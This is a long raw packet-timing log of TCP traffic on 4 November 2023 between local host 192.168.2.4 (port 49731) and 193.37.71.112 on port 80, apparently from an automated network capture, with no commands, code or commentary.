                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.939687014 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.943448067 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.943581104 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.944160938 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.944216013 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.944221020 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.944279909 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.945348024 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.945421934 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.945496082 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.945545912 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.946785927 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.946850061 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.947417021 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.947499990 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.947805882 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.947860003 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.955140114 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.955159903 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.955254078 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.955394983 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.957000971 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.957071066 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.959043026 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.959110022 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.961164951 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.961245060 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.963227034 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.963342905 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.979149103 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.979280949 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.110156059 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.110186100 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.110347986 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.110474110 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.110543966 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.110879898 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.110929966 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.111934900 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.111985922 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.113986015 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.114036083 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.115252972 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.115293980 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.118443012 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.118506908 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.120071888 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.120130062 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.122755051 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.122806072 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.122812033 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.122843027 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.122859001 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.122875929 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.123869896 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.123918056 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.125116110 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.125164032 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.125905037 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.125947952 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.126322031 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.126369953 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.127433062 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.127471924 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.127921104 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.127966881 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.129736900 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.129786015 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.135962009 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.136018991 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.158224106 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.158263922 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.158283949 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.158803940 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.160051107 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.160113096 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.160134077 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.160175085 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.160404921 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.160465002 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.163892031 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.163904905 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.163971901 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.164073944 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.164138079 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.164585114 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.164649010 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.164879084 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.164937973 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.165170908 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.165232897 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.165690899 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.165719032 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.165757895 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.165985107 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.166054010 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.166188002 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.166237116 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.166589022 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.166647911 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.166733980 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.166796923 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.167483091 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.167494059 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.167572021 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.168107033 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.168169022 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.168253899 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.168303967 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.168625116 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.168675900 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.168694973 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.168744087 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.175591946 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.175671101 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.175745010 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.175808907 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.176004887 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.176063061 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.176280975 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.176336050 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.176357985 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.176404953 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.176717997 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.176789999 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.177175045 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.177232027 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.177604914 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.177623034 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.177675962 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.177989006 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.178045034 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.179011106 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.179064035 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.182118893 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.182164907 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.182179928 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.182200909 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.182244062 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.185453892 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.185508966 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186292887 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186326027 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186337948 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186337948 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186371088 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186373949 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186419010 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186419964 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186470032 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186492920 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186537027 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186549902 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186589003 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186638117 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186670065 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186702967 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.186738968 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.200018883 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.200074911 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.242423058 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.242506981 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.330699921 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.330713034 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.330831051 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.331191063 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.331201077 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.331406116 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.332425117 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.332489014 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.334316969 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.334376097 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.335474014 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.335532904 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.338573933 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.338637114 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.340871096 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.340940952 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.342792988 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.342848063 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.343069077 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.343118906 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.344059944 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.344108105 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.346854925 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.346935987 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.347301006 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.347347975 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.348373890 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.348386049 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.348432064 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.348474026 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.352324009 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.352384090 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.357604027 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.357678890 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.379283905 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.379388094 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.379431009 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.379484892 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.380707979 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.380781889 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.380811930 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.380861044 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.384265900 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.384366035 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.384888887 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.384901047 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.384963989 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.385128021 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.385184050 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.390569925 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.390727997 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.392189026 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.392263889 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.394406080 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.394467115 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.396749020 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.396811962 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.396903992 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.396959066 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.397205114 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.397262096 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.397656918 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.397706985 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.397949934 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.397999048 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.398509026 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.398569107 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.399430037 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.399483919 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.399714947 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.399764061 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.400171995 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.400212049 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.400345087 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.400391102 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.401454926 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.401504040 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.403728962 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.403740883 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.403778076 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.403794050 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.403990030 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.404031038 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.405953884 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.406007051 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.407126904 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.407170057 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.408333063 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.408344984 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.408379078 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.408395052 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.408468962 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.408514023 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.408819914 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.408863068 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.409321070 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.409370899 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.409619093 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.409663916 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.409799099 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.409842014 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.410149097 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.410188913 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.413081884 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.413134098 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.421283007 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.421365023 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.506370068 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.506470919 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.551744938 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.551843882 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.552285910 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.552356958 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.554811001 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.554879904 CET4973180192.168.2.4193.37.71.112
